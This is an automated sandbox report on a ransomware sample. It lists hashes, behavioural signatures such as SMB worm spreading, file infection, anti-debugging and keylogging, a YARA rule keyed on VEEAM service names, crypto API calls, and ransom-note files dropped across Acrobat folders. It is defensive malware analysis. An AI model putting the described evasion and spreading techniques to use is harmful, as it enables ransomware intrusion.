Windows Analysis Report
win_gui.exe.exe

Overview

General Information

Sample name:win_gui.exe.exe
(renamed file extension from infected to exe)
Original sample name:win_gui.exe.infected
Analysis ID:1567651
MD5:63e4d0e113333b0bd2af6adb9f06c639
SHA1:34439e3b52a4fea160aee4f52add18d0239bd991
SHA256:41e8d712ef343d367f7f6331a68d6e31ec6830d6f38bec00e72b2915fa697244

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Spreads via windows shares (copies files to share folders)
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • win_gui.exe.exe (PID: 1864 cmdline: "C:\Users\user\Desktop\win_gui.exe.exe" MD5: 63E4D0E113333B0BD2AF6ADB9F06C639)
  • cleanup
No configs have been found
Source: 0.2.win_gui.exe.exe.5c0000.0.unpack
Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM
Description: Detects executables containing many references to VEEAM. Observed in ransomware
Author: unknown
Strings:
  • 0x112093:$s1: VeeamNFSSvc
  • 0x11209f:$s9: VeeamTransportSvc
  • 0x11207c:$s10: VeeamDeploymentService
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: win_gui.exe.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F4200 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,GlobalMemoryStatus,GetCurrentProcessId,0_2_005F4200
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005C7413 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,0_2_005C7413
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F0400 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005F0400
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F0490 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,0_2_005F0490
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F06D0 CryptExportKey,GetLastError,CryptExportKey,GetLastError,0_2_005F06D0
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F0D60 CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError,0_2_005F0D60
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F0F80 CryptAcquireContextW,CryptReleaseContext,0_2_005F0F80
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F12E0 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,0_2_005F12E0
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F1600 CryptEnumProvidersW,CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,GetLastError,0_2_005F1600
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005EF790 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,0_2_005EF790
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F1870 CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertEnumCertificatesInStore,CertCloseStore,CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005F1870
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005EFA10 CryptCreateHash,GetLastError,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,0_2_005EFA10
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F1B90 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005F1B90
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F1C00 CryptDecrypt,GetLastError,0_2_005F1C00
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005C7CCB CryptReleaseContext,0_2_005C7CCB
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005C7C96 CryptGenRandom,0_2_005C7C96
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005EFDF0 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005EFDF0
Source: C:\Users\user\Desktop\win_gui.exe.exe, Code function: 0_2_005F1E90 CryptCreateHash,GetLastError,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,0_2_005F1E90

Exploits

Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.0:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.180:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.181:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.184:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.185:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.182:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.183:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.188:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.189:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.186:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.187:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.191:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.192:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.190:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.195:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.196:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.193:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.194:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.199:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.197:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.198:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.168:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.169:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.162:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.163:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.160:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.161:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.166:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.167:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.164:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.165:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.170:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.179:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.173:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.174:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.171:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.172:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.177:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.178:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.175:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.176:445Jump to behavior
Source: win_gui.exe.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXTJump to behavior
